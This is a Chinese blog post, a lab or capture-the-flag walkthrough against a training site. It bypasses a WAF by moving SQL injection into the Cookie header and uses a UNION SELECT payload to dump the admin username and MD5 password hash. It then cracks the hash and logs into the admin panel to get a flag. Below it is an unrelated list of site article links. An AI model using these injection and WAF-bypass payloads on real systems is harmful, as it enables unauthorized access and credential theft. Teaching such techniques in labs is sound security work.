当前位置: 首页 > news >正文

第二章:遇到阻难!绕过WAF过滤!

初始页面:http://g8wepfcp.ia.aqlab.cn/
image
随机查看新闻动态,进入后的URL:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170
image
判断是否存在注入点:
http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170'
image
被拦截了。
尝试and 1=1也被拦截。
尝试order by,爆出字段为10。
尝试注释绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'/*(s13*/,被拦截了。
尝试内联绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171/*!40000'*/,被拦截了。
尝试双写绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'',被拦截了。
网页防护一般只拦截Get、post传参,尝试将测试语句放到cookie里面,再发送给服务器:
image
页面能正常显示,说明Cookie传参有效,被当作sql语句拼接了。
尝试通过Cookie注入:
cookie值:id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin【from admin的来源不清楚,相关资料直接给出,使用其他表的表名均会爆数据库错误】
image
爆出回显点有:2,3,7,8,9。
爆用户名和密码:admin/b9a2a2b5dffb918c
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
解码密码:b9a2a2b5dffb918c-->welcome【加密是MD5的16位截断】
进入后台http://g8wepfcp.ia.aqlab.cn/admin/【后台地址一般是在url后接/admin】
输入账号密码:admin/welcome。
image
登录成功后拿到Flag。
image

http://www.jsqmd.com/news/161309/

相关文章:

  • Windows系统配置特定目标IP使用指定网关访问
  • 电子凸轮 - 区间运动Ver2.3.0:实现送料动作的位置跟随之旅
  • 基于SpringBoot + Vue的点餐系统
  • 程序员必学!上下文工程:让大模型成为你的‘复杂知识管家‘(建议收藏)
  • PyTorch-CUDA-v2.7镜像中连接Redis缓存热点数据提升响应速度
  • PyTorch-CUDA-v2.7镜像中围绕‘anaconda配置pytorch环境’创作内容
  • Figma不支持本地部署?国内企业如何选UI设计工具(附方案对比)
  • 收藏这份AI大模型学习路线图,助你从小白到专家_AI大模型学习路线,非常详细只看这一篇就够了!
  • 基于SpringBoot + Vue的实验室预约系统
  • PyTorch-CUDA-v2.7镜像中绑定‘yolov11’目标检测新版本造势
  • 2025 实战复盘:物联网 + 数据检索融合项目的核心技术实现与心得
  • PyTorch-CUDA-v2.7镜像中集成Sentry捕获线上异常
  • LangGraph:超越Assistant API的AI Agent开发框架,开发者必学+收藏级教程
  • PyTorch-CUDA-v2.7镜像中联合高校开展AI教学合作
  • PyTorch-CUDA-v2.7镜像中使用RAG提升生成内容可靠性
  • 大数据领域分布式计算的分布式性能调优工具
  • PyTorch-CUDA-v2.7镜像中集成Prometheus监控指标采集
  • PyTorch-CUDA-v2.7镜像中使用tmux保持长任务运行
  • 新手vs老手Agent开发效率差5倍?这套吴恩达亲授的分步验证方法论,让你少走80%弯路
  • PyTorch-CUDA-v2.7镜像中打包自定义Python模块的方法
  • 2025最新!10个AI论文平台测评:本科生写论文痛点全解决
  • PyTorch-CUDA-v2.7镜像中使用Server-Sent Events推送token生成过程
  • 别再死磕AgentExecutor了!从零手搓“可控“AI智能体,LangGraph实战全攻略(附源码)
  • PyTorch-CUDA-v2.7镜像中内置Weights Biases实现实验追踪
  • PyTorch-CUDA-v2.7镜像中使用GitHub Actions实现CI/CD
  • 女人可以用的奶凶奶凶的话术
  • Java毕设选题推荐:基于vue的球赛购票系统设计基于SpringBoot+vue的球赛购票系统足球、篮球、排球等各类球赛的门票销售与管理【附源码、mysql、文档、调试+代码讲解+全bao等】
  • PyTorch-CUDA-v2.7镜像中运行Baichuan大模型的实践经验
  • PyTorch-CUDA-v2.7镜像中生成订单记录的数据库设计思路
  • PyTorch-CUDA-v2.7镜像中使用Celery执行异步任务队列